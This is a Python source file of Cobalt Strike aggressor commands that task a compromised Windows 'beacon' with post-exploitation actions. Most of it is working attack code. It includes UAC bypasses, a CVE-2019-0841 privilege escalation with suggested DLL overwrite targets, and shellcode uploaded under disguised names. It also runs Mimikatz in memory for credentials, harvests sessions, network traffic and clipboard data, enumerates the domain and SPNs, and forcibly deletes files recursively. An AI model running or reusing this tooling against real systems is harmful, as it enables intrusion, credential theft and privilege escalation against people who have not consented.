def _(bid, pattern, out=None):
    """Run Get-IndexedFiles on the beacon for `pattern`, optionally redirecting to `out`.

    The host-recon PowerShell module is imported first (import_host_recon),
    then the command is executed with bpowerpick. Both `pattern` and `out`
    are passed through powershell_quote before being placed on the command line.
    """
    import_host_recon(bid)

    parts = ['Get-IndexedFiles {}'.format(powershell_quote(pattern))]
    if out:
        # redirect the cmdlet's output to the requested file
        parts.append('> {}'.format(powershell_quote(out)))

    aggressor.bpowerpick(bid, ' '.join(parts))
def run(bid, program, args=None, silent=False):
    """Dispatch `program` on beacon `bid` via the module-level lookup tables.

    The tables are consulted in order: `assemblies` (run with
    bexecute_assembly), `powershell` (script imported, then run with
    bpowerpick) and `callbacks` (a Python callable).

    Args:
        bid: beacon id passed through to every aggressor call.
        program: key looked up in the three dispatch tables.
        args: program arguments; None (or any falsy value) becomes [].
        silent: when False the assembly branch emits a btask message; the
            callback branch receives it as a keyword argument.

    Raises:
        RuntimeError: if `program` is in none of the three tables.
    """
    # no args
    if not args:
        args = []

    if program in assemblies:
        assembly = assemblies[program]
        # helpers.eaq presumably quotes the argument list for execute-assembly — verify
        args = helpers.eaq(args)

        if not silent:
            aggressor.btask(bid,
                            'Tasked beacon to run {} {}'.format(program, args))
        # silent=True regardless of the caller's flag; the btask above is the
        # only task message for this branch
        aggressor.bexecute_assembly(bid, assembly, args, silent=True)
    elif program in powershell:
        script = powershell[program]
        aggressor.bpowershell_import(bid, script)

        if isinstance(args, list) or isinstance(args, tuple):
            args = ' '.join(powershell_quote(args))

        # NOTE(review): `args` is a single str here (joined above, or passed in
        # as a str and never joined), so ' '.join(args) iterates over its
        # characters and puts a space between each of them — confirm intent.
        aggressor.bpowerpick(bid, ' '.join(args))
    elif program in callbacks:
        callback = callbacks[program]
        callback(bid, args, silent=silent)
    else:
        raise RuntimeError('Unrecognized program: {}'.format(program))
def elevate_token_shellcode_csharp(bid, shellcode):
    """
    Elevate with token duplication bypass. Execute `shellcode` with a C# helper.

    Uploads tools/execute_assembly.exe, tools/execute_shellcode.exe and the
    `shellcode` file into the beacon's temp directory, runs
    Invoke-TokenDuplication (from modules/FilelessUACBypass.ps1) against the
    uploaded execute_shellcode binary, then removes all three uploads.
    """

    aggressor.bpowershell_import(
        bid, utils.basedir('modules/FilelessUACBypass.ps1'))

    def temp_path(filename):
        # <beacon temp dir>\<filename>; guess_temp is queried once per file
        return r'{}\{}'.format(helpers.guess_temp(bid), filename)

    # (local source, remote destination) pairs, uploaded in this order
    uploads = [
        (utils.basedir('tools/execute_assembly.exe'),
         temp_path('NugetPackage.exe')),
        (utils.basedir('tools/execute_shellcode.exe'),
         temp_path('Stage2.exe')),
        (shellcode, temp_path('nuget.package')),
    ]
    for local_path, remote_path in uploads:
        helpers.upload_to(bid, local_path, remote_path)

    stage2 = uploads[1][1]
    aggressor.bpowerpick(
        bid,
        'Invoke-TokenDuplication -Binary {}'.format(powershell_quote(stage2)))

    # remove every uploaded file, in upload order
    for _, remote_path in uploads:
        aggressor.brm(bid, remote_path)
def elevate_slui_command(bid, command):
    """
    Elevate with slui bypass.

    Imports modules/FilelessUACBypass.ps1 and runs Invoke-SluiBypass with
    `command` (quoted via powershell_quote) as its -Command argument.
    """

    module = utils.basedir('modules/FilelessUACBypass.ps1')
    aggressor.bpowershell_import(bid, module)

    quoted = powershell_quote(command)
    aggressor.bpowerpick(bid, 'Invoke-SluiBypass -Command {}'.format(quoted))
def _(bid, out=None):
    """Run Get-AccountSPNs (from powershell/UserSPN.ps1) on the beacon.

    When `out` is truthy the cmdlet output is redirected to that file; the
    path is passed through powershell_quote first.
    """
    aggressor.bpowershell_import(bid, utils.basedir('powershell/UserSPN.ps1'))

    # output redirection is only added when a file was requested
    redirect = ' > {}'.format(powershell_quote(out)) if out else ''
    aggressor.bpowerpick(bid, 'Get-AccountSPNs' + redirect)
def elevate_eventvwr_command(bid, command):
    """
    Elevate with eventvwr bypass.

    Imports modules/Invoke-EventVwrBypass.ps1 and runs Invoke-EventVwrBypass
    with `command` (quoted via powershell_quote) as its -Command argument.
    """

    module = utils.basedir('modules/Invoke-EventVwrBypass.ps1')
    aggressor.bpowershell_import(bid, module)

    line = 'Invoke-EventVwrBypass -Command {}'.format(powershell_quote(command))
    aggressor.bpowerpick(bid, line)
def elevate_wscript_command(bid, command):
    """
    Elevate with wscript bypass.

    Imports modules/Invoke-WScriptBypassUAC.ps1 and runs
    Invoke-WScriptBypassUAC with `command` (quoted via powershell_quote)
    as its -payload argument.
    """

    module = utils.basedir('modules/Invoke-WScriptBypassUAC.ps1')
    aggressor.bpowershell_import(bid, module)

    line = 'Invoke-WScriptBypassUAC -payload {}'.format(powershell_quote(command))
    aggressor.bpowerpick(bid, line)
def elevate_cve_2019_0841(bid, target, overwrite=None):
    r"""
    Elevate with CVE-2019-0841. Change permissions of 'target'. Optionally
    overwrite 'target' with 'overwrite'.

    Good overwrite options:
      - C:\Program Files\LAPS\CSE\AdmPwd.dll (then run gpupdate)
      - C:\Program Files (x86)\Google\Update\1.3.34.7\psmachine.dll (then wait for google update or run it manually)

    Args:
        bid: beacon id.
        target: remote path whose permissions are changed; it is quoted
            with powershell_quote before being inserted into the script.
        overwrite: optional local file that is uploaded over `target`
            afterwards (helpers.upload_to, then helpers.explorer_stomp).

    Both the module import and the script run use silent=True, so the only
    console output comes from the echo lines inside the script itself.
    """

    native_hardlink_ps1 = utils.basedir('powershell/Native-HardLink.ps1')
    edge_dir = r'$env:localappdata\Packages\Microsoft.MicrosoftEdge_*'
    settings_dat = r'\Settings\settings.dat'

    # The script is .format()ed, so PowerShell's own braces are doubled ({{ }})
    # and only the three named placeholders are substituted.
    command = helpers.code_string(r"""
        # Stop Edge
        echo "[.] Stopping Edge"
        $process = Get-Process -Name MicrosoftEdge 2>$null
        if ($process) {{
            $process | Stop-Process
        }}
        sleep 3
        
        # Hardlink
        $edge_dir = Resolve-Path {edge_dir}
        $settings_dat = $edge_dir.Path + '{settings_dat}'
        echo "[.] Making Hardlink from $settings_dat to {target}"
        rm $settings_dat
        Native-HardLink -Verbose -Link $settings_dat -Target {target}
        
        # Start Edge
        echo "[.] Starting Edge"
        Start Microsoft-Edge:
        sleep 3
        
        # Stop it again
        echo "[.] Stopping Edge"
        $process = Get-Process -Name MicrosoftEdge 2>$null
        if ($process) {{
            $process | Stop-Process
        }}

        echo "[+] All Finished!"
        echo "[.] New ACLs:"
        Get-Acl {target} | Format-List
        """.format(edge_dir=edge_dir,
                   settings_dat=settings_dat,
                   target=powershell_quote(target)))

    aggressor.bpowershell_import(bid, native_hardlink_ps1, silent=True)
    aggressor.bpowerpick(bid, command, silent=True)

    # optional second step: replace the (now re-permissioned) target
    if overwrite:
        helpers.upload_to(bid, overwrite, target)
        helpers.explorer_stomp(bid, target)
def elevate_token_command(bid, command, *other_args):
    """
    Elevate with token duplication bypass. Execute `command` with its
    arguments.

    `command` is split on whitespace: the first token becomes the -Binary
    value and the remaining tokens, if any, are re-joined with spaces and
    passed as -Arguments (both quoted via powershell_quote). Anything in
    `other_args` is appended verbatim, space-separated, to the end of the
    Invoke-TokenDuplication line.
    """

    binary, *arguments = command.split()

    aggressor.bpowershell_import(
        bid, utils.basedir('modules/FilelessUACBypass.ps1'))

    pieces = [
        'Invoke-TokenDuplication -Binary {} '.format(powershell_quote(binary))
    ]

    if arguments:
        pieces.append('-Arguments {} '.format(
            powershell_quote(' '.join(arguments))))

    if other_args:
        pieces.append(' '.join(other_args))

    aggressor.bpowerpick(bid, ''.join(pieces))
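def _(bid, *dirs):
    r"""List the contents two levels down (`<dir>\*\*`) for each of `dirs`.

    Defaults to the current directory when no `dirs` are given. Each
    `<dir>\*\*` pattern is quoted with powershell_quote and the quoted
    patterns are passed to `ls` as a comma-separated list; the command runs
    silently after a btask message.

    Args:
        bid: beacon id.
        *dirs: directories to list; defaults to ('.',).
    """
    # default dir is .
    if not dirs:
        dirs = ['.']

    # raw string: '\*' is not a valid escape sequence, so a plain literal only
    # produced the right text by accident (and warns on newer Pythons)
    targets = [powershell_quote(r'{}\*\*'.format(d)) for d in dirs]
    command = 'ls ' + ', '.join(targets)

    aggressor.btask(bid,
                    'Tasked beacon to list */* in: {}'.format(', '.join(dirs)))
    aggressor.bpowerpick(bid, command, silent=True)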
def _(bid, *dirs):
    """Recursively and forcibly delete each of `dirs` on the beacon (`rmr`).

    Reports an error via berror and returns when no directories are given.
    One `Remove-Item -Recurse -Force <quoted dir>` line is emitted per
    directory; the combined script runs silently after a btask message.
    """
    if not dirs:
        aggressor.berror(bid, 'rmr: specify some directories to kill')
        return

    lines = ['Remove-Item -Recurse -Force {}\n'.format(powershell_quote(d))
             for d in dirs]

    aggressor.btask(
        bid, 'Tasked beacon to recursively delete: {}'.format(', '.join(dirs)))
    aggressor.bpowerpick(bid, ''.join(lines), silent=True)
def _(bid, *dirs):
    """Recursively list files under each of `dirs` on the beacon.

    Defaults to the current directory when no `dirs` are given. One
    `Get-ChildItem -Recurse <quoted dir>` line is emitted per directory;
    the combined script runs silently after a btask message.
    """
    # default dir is .
    if not dirs:
        dirs = ['.']

    lines = ['Get-ChildItem -Recurse {}\n'.format(powershell_quote(d))
             for d in dirs]

    aggressor.btask(
        bid, 'Tasked beacon to recursively list files in: {}'.format(
            ', '.join(dirs)))
    aggressor.bpowerpick(bid, ''.join(lines), silent=True)
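def _(bid, *hosts):
    """Resolve each of `hosts` with nslookup on the beacon.

    Reports an error via berror and returns when no hosts are given. One
    `nslookup <quoted host>` line is emitted per host; the combined script
    runs silently after a btask message.

    Args:
        bid: beacon id.
        *hosts: hostnames to resolve, each quoted with powershell_quote.
    """
    if not hosts:
        # berror takes the beacon id first, as every other berror/btask call
        # in this file does; without it the error is not tied to the beacon
        aggressor.berror(bid, 'specify a host')
        return

    command = ''.join('nslookup {}\n'.format(powershell_quote(host))
                      for host in hosts)

    aggressor.btask(
        bid, 'Tasked beacon to resolve host(s): {}'.format(', '.join(hosts)))
    aggressor.bpowerpick(bid, command, silent=True)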
def _(bid, *dirs):
    """List reparse points (links) directly under each of `dirs` via fsutil.

    Defaults to the current directory when no `dirs` are given. For each
    directory a `Get-ChildItem <dir> | % { fsutil reparsepoint query $_ }`
    line is emitted; the combined script runs silently after a btask message.
    """
    # default dir is .
    if not dirs:
        dirs = ['.']

    # braces doubled so .format() leaves the PowerShell script block intact
    template = 'Get-ChildItem {path} | % {{ fsutil reparsepoint query $_ }}\n'
    script = ''.join(template.format(path=powershell_quote(d)) for d in dirs)

    aggressor.btask(
        bid, 'Tasked beacon to list links in: {}'.format(', '.join(dirs)))
    aggressor.bpowerpick(bid, script, silent=True)
def _(bid, *lnks):
    """Print the target of each .lnk shortcut in `lnks` through WScript.Shell.

    One COM object is created up front, then a CreateShortcut/echo snippet is
    appended per shortcut (each path quoted with powershell_quote). The
    combined script runs silently after a btask message.
    """
    snippet = r"""
            $shortcut = $sh.CreateShortcut({})
            #$target = $shortcut.TargetPath
            #$arguments = $target.Arguments
            #echo "$target $arguments"
            echo "$shortcut.TargetPath $target.Arguments"
            """

    # NOTE(review): the echo line references $target, which is only assigned
    # in the commented-out PowerShell above — check the output is what is wanted
    script = '$sh = New-Object -ComObject WScript.Shell'
    for lnk in lnks:
        script += helpers.code_string(snippet.format(powershell_quote(lnk)))

    aggressor.btask(bid,
                    'Tasked beacon to read links: {}'.format(', '.join(lnks)))
    aggressor.bpowerpick(bid, script, silent=True)
def _(bid, command, *args):
    """Run Invoke-Mimikatz with `command` and `args` via a beacon-hosted script.

    Reads powershell/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1 from disk,
    hosts it with beacon_host_script, waits 10 seconds, then runs the
    returned loader line followed by the Invoke-Mimikatz call through
    bpowerpick. `command` is inserted unquoted; each of `args` goes through
    powershell_quote.
    """
    script_file = utils.basedir(
        'powershell/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1')
    with open(script_file, 'r') as fp:
        script = fp.read()

    # host it
    cmd = aggressor.beacon_host_script(bid, script)
    # fixed delay before using the hosted script — presumably to let the
    # hosting task reach the beacon first; TODO confirm
    time.sleep(10)

    # execute in-memory hosted script
    engine.message(cmd)
    aggressor.bpowerpick(
        bid, cmd + ';\n Invoke-Mimikatz -Command {} {}'.format(
            command, ' '.join(powershell_quote(args))))
def _(bid, *dirs):
    """List each of `dirs` sorted by last write time, oldest first.

    Defaults to the current directory when no `dirs` are given. Per
    directory a `Get-ChildItem -Path <dir> | Sort-Object LastWriteTime`
    snippet is appended; the combined script runs silently after a btask
    message.
    """
    # default dir is .
    if not dirs:
        dirs = ['.']

    snippet = r"""
            Get-ChildItem -Path {} |
            Sort-Object LastWriteTime -Ascending;
            """
    script = ''.join(
        helpers.code_string(snippet.format(powershell_quote(d))) for d in dirs)

    aggressor.btask(
        bid, 'Tasked beacon to do a sorted-by-time list of: {}'.format(
            ', '.join(dirs)))
    aggressor.bpowerpick(bid, script, silent=True)
def _(bid, url):
    """Fetch `url` from the beacon and print the HTTP response headers.

    A `url` without ':' gets an 'http://' scheme prepended. The request is
    built with System.Net.WebRequest (the URL quoted via powershell_quote)
    and each header key/value pair is printed through Select-Object. Runs
    silently after a btask message.
    """
    if ':' not in url:
        # add scheme
        url = 'http://' + url

    # only the first snippet is .format()ed; the second contains literal braces
    request_snippet = r"""
        $request = [System.Net.WebRequest]::Create({})
        """.format(powershell_quote(url))
    headers_snippet = r"""
        $response = $request.GetResponse()
        $headers = $response.Headers
        $headers.AllKeys |
             Select-Object @{ Name = "Key"; Expression = { $_ }},
             @{ Name = "Value"; Expression = { $headers.GetValues( $_ ) } }
         """
    script = helpers.code_string(request_snippet)
    script += helpers.code_string(headers_snippet)

    aggressor.btask(bid,
                    'Tasked beacon to get headers for URL: {}'.format(url))
    aggressor.bpowerpick(bid, script, silent=True)
def _(bid):
    """Domain enumeration, stage 1 of 3, run through the 'powerview' program.

    Changes into the beacon's temp directory and runs a series of PowerView
    cmdlets, redirecting each result into a *.domain file there. The script
    is dispatched with external.run(bid, 'powerview', ...) rather than
    bpowerpick directly.
    """
    temp = helpers.guess_temp(bid)

    # Candidates not (yet) included in this stage, kept for reference:
    #   Forests and trusts: Get-DomainTrustMapping, Get-ForestTrust, Get-DomainTrust
    #   Parsing GPOs:       Get-GptTmpl, Get-GroupsXML
    #   File shares:        Get-DomainFileServer, Get-DomainDFSShare
    #   Get-DomainManagedSecurityGroup?

    # TODO remove subnet and site?
    # computer objects don't show up in Get-DomainObject for some reason

    # The script is .format()ed: the single {} is the quoted temp dir and the
    # PowerShell script block on the Get-DomainGPO line uses doubled braces.
    command = helpers.code_string(r"""
        cd {}
        $FormatEnumerationLimit=-1
        Get-DomainObject | Format-List -Property * > objects.domain
        Get-DomainPolicyData | Format-List -Property * > policy.domain
        Get-DomainSite | Format-List -Property * > sites.domain
        Get-DomainSubnet | Format-List -Property * > subnets.domain
        Get-DomainGPOUserLocalGroupMapping | Format-List -Property * > gpo_localgroups.domain
        Get-GPODelegation | Format-List -Property * > gpo_delegations.domain
        Get-DomainGPO | %{{Get-ObjectACL -ResolveGUIDs -Name $_.Name}} > gpo_acls.domain
        Get-DomainTrustMapping | Format-List -Property * > trusts.domain
        Get-DomainManagedSecurityGroup | Format-List -Property * > managers.domain
        Invoke-ACLScanner -ResolveGUIDs > interesting_acls.domain
        echo "All finished with domain-enum. Run domain-enum-next."
        """.format(powershell_quote(temp)))

    aggressor.btask(
        bid, 'Tasked beacon to enumerate domain objects and info (stage 1/3)')
    external.run(bid, 'powerview', command)
def _(bid, *dirs):
    """Report the total size (MB) of each entry directly under each of `dirs`.

    Defaults to the current directory when no `dirs` are given. For each
    directory a `gci <dir> |` line (quoted via powershell_quote) is followed
    by a fixed pipeline that sums file lengths recursively per entry, sorts
    by Sum descending and prints a Name / Sum (MB) / Sum table. Runs
    silently after a btask message.
    """
    # default dir is .
    if not dirs:
        dirs = ['.']

    command = ''
    for d in dirs:
        # only this first fragment is .format()ed; the pipeline below is a raw
        # string with literal braces and is appended as-is
        command += """
        gci {} |
        """.format(powershell_quote(d))

        command += helpers.code_string(r"""
                       %{$f=$_; gci -r $_.FullName |
                         measure-object -property length -sum |
                         select  @{Name="Name"; Expression={$f}},
                                 @{Name="Sum (MB)";
                                 Expression={"{0:N3}" -f ($_.sum / 1MB) }}, Sum } |
                       sort Sum -desc |
                       format-table -Property Name,"Sum (MB)", Sum -autosize;
                       """)

    aggressor.btask(
        bid, 'Tasked beacon to get file sizes in: {}'.format(', '.join(dirs)))
    aggressor.bpowerpick(bid, command, silent=True)
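def _(bid, *args):
    """Search for files under a directory on the beacon (the `find` command).

    Builds a `gci -Recurse` pipeline from the parsed options: -n/--name and
    -i/--iname add case-sensitive / case-insensitive `-Like` name filters
    (combined with -Or, inverted by --not), --dirs keeps directories in the
    output, -d/--days keeps only entries written within the last DAYS days,
    -o/--out redirects the output to a file and --home searches relative to
    $env:userprofile. The command runs silently unless -v/--verbose is set.

    Args:
        bid: beacon id.
        *args: raw command-line tokens, parsed with helpers.ArgumentParser.
            On a parse error the function returns without tasking anything.
    """
    parser = helpers.ArgumentParser(bid=bid, prog='find')
    parser.add_argument('-n', '--name', action='append', help='Name to match')
    parser.add_argument('-i',
                        '--iname',
                        action='append',
                        help='Name to match (case insensitive)')
    parser.add_argument('--not',
                        dest='not_',
                        action='store_true',
                        help='Invert --name and --iname')
    parser.add_argument('-d',
                        '--days',
                        type=int,
                        help='Select files no more than DAYS old')
    parser.add_argument('--dirs',
                        action='store_true',
                        help='Include directories')
    parser.add_argument('-o', '--out', help='Output file')
    parser.add_argument('-v',
                        '--verbose',
                        action='store_true',
                        help='Enable verbose')
    # argparse %-expands help text (e.g. %(default)s), so a literal '%' has to
    # be doubled or rendering the help raises ValueError — assumes
    # helpers.ArgumentParser is argparse-based, as its interface suggests
    parser.add_argument('--home',
                        action='store_true',
                        help='Search relative to %%USERPROFILE%% instead of .')
    parser.add_argument('dir',
                        default='.',
                        help='Directory to search from (default: .)')
    try:
        args = parser.parse_args(args)
    except (SystemExit, Exception):
        # the bid-aware parser presumably reports the usage error itself;
        # nothing is tasked on a bad command line
        return

    # --home
    if args.home:
        directory = r'$env:userprofile\{}'.format(powershell_quote(args.dir))
    else:
        directory = powershell_quote(args.dir)

    command = 'gci -Recurse -Path {} 2>$null'.format(directory)

    # --dirs: without it, containers are dropped from the results
    if not args.dirs:
        command += ' | where { ! $_.PSIsContainer }'

    # -n/--name (case-sensitive) and -i/--iname (case-insensitive)
    name_matches = ['$_.Name -Clike {}'.format(powershell_quote(name))
                    for name in args.name or []]
    name_matches += ['$_.Name -Like {}'.format(powershell_quote(iname))
                     for iname in args.iname or []]

    if name_matches:
        where_statement = ' -Or '.join(name_matches)

        # --not
        if args.not_:
            where_statement = '-Not ({})'.format(where_statement)

        command += " | Where-Object { " + where_statement + " }"

    # -d/--days: DAYS is substituted into the filter; the braces of the
    # PowerShell script block are doubled so .format() leaves them in place
    if args.days:
        command += (' | ? {{ $_.LastWriteTime -Ge (Get-Date).AddDays(-{}) }}'
                    .format(args.days))

    # -o/--out
    if args.out:
        command += ' > {}'.format(powershell_quote(args.out))

    command += "; echo 'Finished searching in {}'".format(directory)

    aggressor.btask(
        bid, 'Tasked beacon to search for files in {}'.format(directory))
    # -v/--verbose
    aggressor.bpowerpick(bid, command, silent=not args.verbose)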
def _(bid, *exes):
    """Show the FileDescription of each executable in `exes` (`describe`).

    Args:
        bid: beacon id.
        *exes: executable paths, each quoted with powershell_quote.

    Raises:
        RuntimeError: when no executables are given.
    """
    command = ''

    if not exes:
        raise RuntimeError('describe: Specify at least one exe to describe')

    for exe in exes:
        # NOTE(review): this fragment references $_.Name and ends with an
        # unmatched '}', so the opening of a pipeline / script block appears
        # to be missing — confirm against the intended PowerShell
        command += '"{0}, {1}" -f $_.Name, [System.Diagnostics.FileVersionInfo]::GetVersionInfo(' + powershell_quote(
            exe) + ').FileDescription }\n'

    aggressor.btask(
        bid,
        'Tasked beacon to show version info for: {}'.format(', '.join(exes)))
    aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *args):
    """Run Invoke-SessionGopher (powershell/SessionGopher.ps1) with `args`.

    Each argument is passed through powershell_quote and the quoted values
    are space-joined onto the command line.
    """
    script = utils.basedir('powershell/SessionGopher.ps1')
    aggressor.bpowershell_import(bid, script)

    quoted_args = ' '.join(powershell_quote(args))
    aggressor.bpowerpick(bid, 'Invoke-SessionGopher ' + quoted_args)
def _(bid, *args):
    r"""Run Invoke-NetRipper (powershell/Invoke-NetRipper.ps1) with `args`.

    The -LogLocation is fixed to C:\Temp\; each extra argument is passed
    through powershell_quote and the quoted values are space-joined onto
    the command line.
    """
    script = utils.basedir('powershell/Invoke-NetRipper.ps1')
    aggressor.bpowershell_import(bid, script)

    quoted_args = ' '.join(powershell_quote(args))
    command = r'Invoke-NetRipper -LogLocation C:\Temp\ ' + quoted_args
    aggressor.bpowerpick(bid, command)
def _(bid, *args):
    """Run Start-ClipboardMonitor (powershell/Start-ClipboardMonitor.ps1) with `args`.

    Each argument is passed through powershell_quote and the quoted values
    are space-joined onto the command line.
    """
    script = utils.basedir('powershell/Start-ClipboardMonitor.ps1')
    aggressor.bpowershell_import(bid, script)

    quoted_args = ' '.join(powershell_quote(args))
    aggressor.bpowerpick(bid, 'Start-ClipboardMonitor {}'.format(quoted_args))
def _(bid, url):
    """Have the beacon fetch `url` with WebClient.DownloadString and print the body.

    `url` is quoted with powershell_quote before being placed in the command.
    """
    quoted_url = powershell_quote(url)
    command = '(New-Object System.Net.WebClient).DownloadString({})'.format(
        quoted_url)
    aggressor.bpowerpick(bid, command)
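def _(bid, fname, lines=10):
    """Print the last `lines` lines of `fname` on the beacon (`gc | select -last`).

    Args:
        bid: beacon id.
        fname: remote file path; quoted with powershell_quote.
        lines: number of trailing lines to show (default 10). It is
            interpolated unquoted, so an int is expected.
    """
    # btask takes the beacon id first, as every other btask call in this
    # file does; without it the message is not tied to the beacon
    aggressor.btask(bid, 'Tasked beacon to get tail of {}'.format(fname))
    command = 'gc {} | select -last {} '.format(powershell_quote(fname), lines)
    aggressor.bpowerpick(bid, command, silent=True)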